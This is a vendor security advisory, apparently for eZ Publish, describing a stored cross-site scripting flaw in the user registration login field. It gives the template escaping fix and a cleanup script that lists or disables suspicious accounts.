This Security Update fixes a cross site scripting (XSS) vulnerability where an attacker could insert JavaScript commands into the login field (username) of their user account, when registering as a new user. If an administrator would later edit that user object, the script would execute with the administrator's permission level. The vulnerability affects sites where untrusted users can create user accounts. The Security Update ensures that script commands cannot be entered in the login field when registering, and ensures that existing commands are not executed when an administrator edits the user object. We strongly recommend that you install this Security Update as soon as possible. If your web site has a template override for design/standard/templates/content/datatype/edit/ezuser.tpl, please note it is mandatory to use the "wash" template operator on the "{$attribute.content.login}", i.e. it should read "{$attribute.content.login|wash()}".
Additionally, a new command line script is included: update/common/scripts/4.7/disablesuspicioususers.php This script can list and disable all accounts that contain the kind of content an attacker would use, when run like this: php update/common/scripts/4.7/disablesuspicioususers.php --disable It can also be run without the --disable parameter. In this case it will only output the list of affected user accounts. php update/common/scripts/4.7/disablesuspicioususers.php
Patch
See github for patch.
Credits
Thanks Serhey Dolgushev for the report!
